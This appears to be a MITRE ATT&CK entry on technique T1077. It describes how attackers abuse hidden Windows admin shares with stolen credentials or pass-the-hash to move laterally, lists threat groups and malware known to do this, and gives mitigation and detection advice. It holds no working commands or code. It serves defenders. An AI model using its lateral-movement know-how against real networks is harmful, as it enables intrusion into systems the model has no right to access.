# Windows Admin Shares

Technique
ID T1077
Tactic Lateral Movement
Platform Windows Server 2003, Windows Server 2008, Windows Server 2012, Windows XP, Windows 7, Windows 8, Windows Server 2003 R2, Windows Server 2008 R2, Windows Server 2012 R2, Windows Vista, Windows 8.1, Windows 10
System Requirements

File and printer sharing over SMB enabled. Host/network firewalls not blocking SMB ports between source and destination.

Use of domain account in administrator group on remote system or default system admin account.
Data Sources Process use of network, Authentication logs, Process command-line parameters, Process monitoring
CAPEC ID CAPEC-561

Windows systems have hidden network shares that are accessible only to administrators and provide the ability for remote file copy and other administrative functions. Example network shares include C$, ADMIN$, and IPC$. Adversaries may use this technique in conjunction with administrator-level Valid Accounts to remotely access a networked system over server message block (SMB)1 to interact with systems using remote procedure calls (RPCs),2 transfer files, and run transferred binaries through remote Execution. Example execution techniques that rely on authenticated sessions over SMB/RPC are Scheduled Task, Service Execution, and Windows Management Instrumentation. Adversaries can also use NTLM hashes to access administrator shares on systems with Pass the Hash and certain configuration and patch levels.3 The Net utility can be used to connect to Windows admin shares on remote systems using net use commands with valid credentials.4 ## Contents ## Examples • Deep Panda uses net.exe to connect to network shares using "net use" commands with compromised credentials.5 • Ke3chang actors have been known to copy files to the network shares of other computers to move laterally.6 • Lazarus Group malware SierraAlfa accesses the ADMIN$ share via SMB to conduct lateral movement.7
• Threat Group-1314 actors mapped network drives using net use.8
• Turla uses net use commands to connect to lateral systems within a network.9
• BlackEnergy has run a plug-in on a victim to spread through the local network by using PsExec and accessing admin shares.10
• Adversaries can instruct Duqu to spread laterally by copying itself to shares it has enumerated and for which it has obtained legitimate credentials (via keylogging or other means). The remote host is then infected by using the compromised credentials to schedule a task on remote machines that executes the malware.11
• Net Crawler uses Windows admin shares to establish authenticated sessions to remote systems over SMB as part of lateral movement.12
• Lateral movement can be done with Net through net use commands to connect to the Windows admin shares on remote systems.13
• PsExec, a tool that has been used by adversaries, writes programs to the ADMIN\$ network share to execute commands on remote systems.14
• The Regin malware platform can use Windows admin shares to move laterally.15
• Shamoon accesses network share(s), enables share access to the target device, and copies an executable payload to the target system, and uses a Scheduled Task to execute the malware.16

## Mitigation

Do not reuse local administrator account passwords across systems. Ensure password complexity and uniqueness such that the passwords cannot be cracked or guessed. Deny remote use of local admin credentials to log into systems. Do not allow domain user accounts to be in the local Administrators group multiple systems.

Identify unnecessary system utilities or potentially malicious software that may be used to leverage SMB and the Windows admin shares, and audit and/or block them by using whitelisting17 tools, like AppLocker,1819 or Software Restriction Policies20 where appropriate.21

## Detection

Ensure that proper logging of accounts used to log into systems is turned on and centrally collected. Windows logging is able to collect success/failure for accounts that may be used to move laterally and can be collected using tools such as Windows Event Forwarding.2223 Monitor remote login events and associated SMB activity for file transfers and remote process execution. Monitor the actions of remote users who connect to administrative shares. Monitor for use of tools and commands to connect to remote shares, such as Net, on the command-line interface and Discovery techniques that could be used to find remotely accessible systems.